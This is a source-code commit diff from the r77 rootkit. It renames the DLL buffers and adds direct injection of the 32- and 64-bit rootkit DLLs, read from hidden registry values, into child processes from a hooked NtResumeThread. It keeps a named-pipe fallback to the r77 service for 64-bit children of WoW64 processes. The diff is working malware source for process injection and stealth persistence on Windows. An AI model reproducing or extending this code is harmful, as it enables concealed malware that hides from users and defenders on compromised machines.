NtResumtThread: Inject directly if possible

Author: Martin Fischer

Service/Service.c

@@ -50,14 +50,14 @@ BOOL InitializeService()
 	// Get both r77 DLL's.
 	HKEY key;
 	if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE", 0, KEY_QUERY_VALUE, &key) != ERROR_SUCCESS ||
-		RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, NULL, &Dll32Size) != ERROR_SUCCESS ||
-		RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, NULL, &Dll64Size) != ERROR_SUCCESS) return FALSE;
+		RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, NULL, &RootkitDll32Size) != ERROR_SUCCESS ||
+		RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, NULL, &RootkitDll64Size) != ERROR_SUCCESS) return FALSE;
 
-	Dll32 = NEW_ARRAY(BYTE, Dll32Size);
-	Dll64 = NEW_ARRAY(BYTE, Dll64Size);
+	RootkitDll32 = NEW_ARRAY(BYTE, RootkitDll32Size);
+	RootkitDll64 = NEW_ARRAY(BYTE, RootkitDll64Size);
 
-	if (RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, Dll32, &Dll32Size) != ERROR_SUCCESS ||
-		RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, Dll64, &Dll64Size) != ERROR_SUCCESS) return FALSE;
+	if (RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, RootkitDll32, &RootkitDll32Size) != ERROR_SUCCESS ||
+		RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, RootkitDll64, &RootkitDll64Size) != ERROR_SUCCESS) return FALSE;
 
 	RegCloseKey(key);
 
@@ -132,8 +132,8 @@ VOID ChildProcessCallback(DWORD processId)
 
 	if (!IsInjectionPaused)
 	{
-		InjectDll(processId, Dll32, Dll32Size);
-		InjectDll(processId, Dll64, Dll64Size);
+		InjectDll(processId, RootkitDll32, RootkitDll32Size);
+		InjectDll(processId, RootkitDll64, RootkitDll64Size);
 	}
 }
 VOID NewProcessCallback(DWORD processId)
@@ -142,8 +142,8 @@ VOID NewProcessCallback(DWORD processId)
 
 	if (!IsInjectionPaused)
 	{
-		InjectDll(processId, Dll32, Dll32Size);
-		InjectDll(processId, Dll64, Dll64Size);
+		InjectDll(processId, RootkitDll32, RootkitDll32Size);
+		InjectDll(processId, RootkitDll64, RootkitDll64Size);
 	}
 }
 VOID ControlCallback(DWORD controlCode, HANDLE pipe)
@@ -190,8 +190,8 @@ VOID ControlCallback(DWORD controlCode, HANDLE pipe)
 			DWORD bytesRead;
 			if (ReadFile(pipe, &processId, sizeof(DWORD), &bytesRead, NULL) && bytesRead == sizeof(DWORD))
 			{
-				InjectDll(processId, Dll32, Dll32Size);
-				InjectDll(processId, Dll64, Dll64Size);
+				InjectDll(processId, RootkitDll32, RootkitDll32Size);
+				InjectDll(processId, RootkitDll64, RootkitDll64Size);
 			}
 
 			break;
@@ -206,8 +206,8 @@ VOID ControlCallback(DWORD controlCode, HANDLE pipe)
 
 				for (DWORD i = 0; i < processCount; i++)
 				{
-					InjectDll(processes[i], Dll32, Dll32Size);
-					InjectDll(processes[i], Dll64, Dll64Size);
+					InjectDll(processes[i], RootkitDll32, RootkitDll32Size);
+					InjectDll(processes[i], RootkitDll64, RootkitDll64Size);
 				}
 			}
 			break;

Service/Service.h

@@ -4,19 +4,20 @@
 /// <summary>
 /// The 32-bit r77 DLL.
 /// </summary>
-LPBYTE Dll32;
+LPBYTE RootkitDll32;
 /// <summary>
 /// The size of the 32-bit r77 DLL.
 /// </summary>
-DWORD Dll32Size;
+DWORD RootkitDll32Size;
 /// <summary>
 /// The 64-bit r77 DLL.
 /// </summary>
-LPBYTE Dll64;
+LPBYTE RootkitDll64;
 /// <summary>
 /// The size of the 64-bit r77 DLL.
 /// </summary>
-DWORD Dll64Size;
+DWORD RootkitDll64Size;
+
 /// <summary>
 /// The thread that listens for notifications about created child processes.
 /// </summary>

r77/Hooks.c

@@ -3,6 +3,7 @@
 #include "Config.h"
 #include "r77def.h"
 #include "r77win.h"
+#include "r77process.h"
 #include "ntdll.h"
 #include "detours.h"
 #include <Shlwapi.h>
@@ -214,38 +215,56 @@ static NTSTATUS NTAPI HookedNtResumeThread(HANDLE thread, PULONG suspendCount)
 	// Child process hooking:
 	// When a process is created, its parent process calls NtResumeThread to start the new process after process creation is completed.
 	// At this point, the process is suspended and should be injected. After injection is completed, NtResumeThread should be called.
-	// To inject the process, a connection to the r77 service is performed through a named pipe.
-	// Because a 32-bit process can create a 64-bit child process, injection cannot be performed here.
+
+	// If this process is 32-bit and the new process is 64-bit:
+	//   Injection cannot be performed here. An injection request is sent to the r77 service through a named pipe.
+	// Else:
+	//   The new process is injected directly.
 
 	DWORD processId = GetProcessIdOfThread(thread);
 	if (processId != GetCurrentProcessId()) // If NtResumeThread is called on this process, it is not a child process
 	{
-		// Call the r77 service and pass the process ID.
-		HANDLE pipe = CreateFileW(CHILD_PROCESS_PIPE_NAME, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
-		if (pipe != INVALID_HANDLE_VALUE)
+		BOOL isWow64;
+		BOOL process64Bit;
+		if (RootkitDll32 == NULL ||
+			RootkitDll64 == NULL ||
+			!IsWow64Process(GetCurrentProcess(), &isWow64) ||
+			!Is64BitProcess(processId, &process64Bit) ||
+			isWow64 && process64Bit) // Current process is WoW, child process is x64
 		{
-			WRITE_CHILD_PROCESS_PIPET_HREAD_PARAMETERS parameters;
-			parameters.PipeHandle = pipe;
-			parameters.ProcessId = processId;
+			// Call the r77 service and pass the process ID.
+			HANDLE pipe = CreateFileW(CHILD_PROCESS_PIPE_NAME, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+			if (pipe != INVALID_HANDLE_VALUE)
+			{
+				WRITE_CHILD_PROCESS_PIPET_HREAD_PARAMETERS parameters;
+				parameters.PipeHandle = pipe;
+				parameters.ProcessId = processId;
 
-			// In some cases, the WriteFile call to the named pipe hangs indefinitely.
-			// This bug was introduced after injecting the r77 service into winlogon, rather than in a hollowed process.
+				// In some cases, the WriteFile call to the named pipe hangs indefinitely.
+				// This bug was introduced after injecting the r77 service into winlogon, rather than in a hollowed process.
 
-			// Therefore, we must execute this write operation in a separate thread.
-			// If this thread does not return within a given amount of time, we must assume that it failed,
-			// and just continue process initialization. The periodic process injection will catch this process
-			// within less than 100ms.
+				// Therefore, we must execute this write operation in a separate thread.
+				// If this thread does not return within a given amount of time, we must assume that it failed,
+				// and just continue process initialization. The periodic process injection will catch this process
+				// within less than 100ms.
 
-			HANDLE thread = CreateThread(NULL, 0, WriteChildProcessPipeThread, &parameters, 0, NULL);
-			if (thread)
-			{
-				if (WaitForSingleObject(thread, 500) != WAIT_OBJECT_0)
+				HANDLE thread = CreateThread(NULL, 0, WriteChildProcessPipeThread, &parameters, 0, NULL);
+				if (thread)
 				{
-					// WriteFile got stuck.
-					TerminateThread(thread, 0);
+					if (WaitForSingleObject(thread, 500) != WAIT_OBJECT_0)
+					{
+						// WriteFile got stuck.
+						TerminateThread(thread, 0);
+					}
 				}
 			}
 		}
+		else
+		{
+			// Inject the process directly.
+			InjectDll(processId, RootkitDll32, RootkitDll32Size);
+			InjectDll(processId, RootkitDll64, RootkitDll64Size);
+		}
 	}
 
 	// This function returns, *after* injection is completed.

r77/Rootkit.c

@@ -26,6 +26,28 @@ BOOL InitializeRootkit()
 
 		// Attach hooks.
 		InitializeHooks();
+
+		// Get both r77 DLL's.
+		HKEY key;
+		if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE", 0, KEY_QUERY_VALUE | KEY_WOW64_64KEY, &key) == ERROR_SUCCESS &&
+			RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, NULL, &RootkitDll32Size) == ERROR_SUCCESS &&
+			RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, NULL, &RootkitDll64Size) == ERROR_SUCCESS)
+		{
+			LPBYTE dll32 = NEW_ARRAY(BYTE, RootkitDll32Size);
+			LPBYTE dll64 = NEW_ARRAY(BYTE, RootkitDll64Size);
+
+			if (RegQueryValueExW(key, HIDE_PREFIX L"dll32", NULL, NULL, dll32, &RootkitDll32Size) == ERROR_SUCCESS &&
+				RegQueryValueExW(key, HIDE_PREFIX L"dll64", NULL, NULL, dll64, &RootkitDll64Size) == ERROR_SUCCESS)
+			{
+				RootkitDll32 = dll32;
+				RootkitDll64 = dll64;
+			}
+			else
+			{
+				FREE(dll32);
+				FREE(dll64);
+			}
+		}
 	}
 
 	return TRUE;
@@ -44,6 +66,9 @@ VOID UninitializeRootkit()
 
 		// Detach hooks.
 		UninitializeHooks();
+
+		FREE(RootkitDll32);
+		FREE(RootkitDll64);
 	}
 }
 static VOID DetachRootkit()

r77/Rootkit.h

@@ -2,6 +2,23 @@
 #ifndef _ROOTKIT_H
 #define _ROOTKIT_H
 
+/// <summary>
+/// The 32-bit r77 DLL.
+/// </summary>
+LPBYTE RootkitDll32;
+/// <summary>
+/// The size of the 32-bit r77 DLL.
+/// </summary>
+DWORD RootkitDll32Size;
+/// <summary>
+/// The 64-bit r77 DLL.
+/// </summary>
+LPBYTE RootkitDll64;
+/// <summary>
+/// The size of the 64-bit r77 DLL.
+/// </summary>
+DWORD RootkitDll64Size;
+
 /// <summary>
 /// Initializes r77, writes the r77 header and installs hooks.
 /// <para>This function returns FALSE, if r77 is already injected, or if this process is either the r77 service or a helper process, or the process starts with $77.</para>

r77api/r77win.c

@@ -110,7 +110,7 @@ PWCHAR Int32ToStrW(LONG value, PWCHAR buffer)
 
 BOOL Is64BitOperatingSystem()
 {
-	BOOL wow64 = FALSE;
+	BOOL wow64;
 	return BITNESS(64) || IsWow64Process(GetCurrentProcess(), &wow64) && wow64;
 }
 BOOL IsAtLeastWindows10()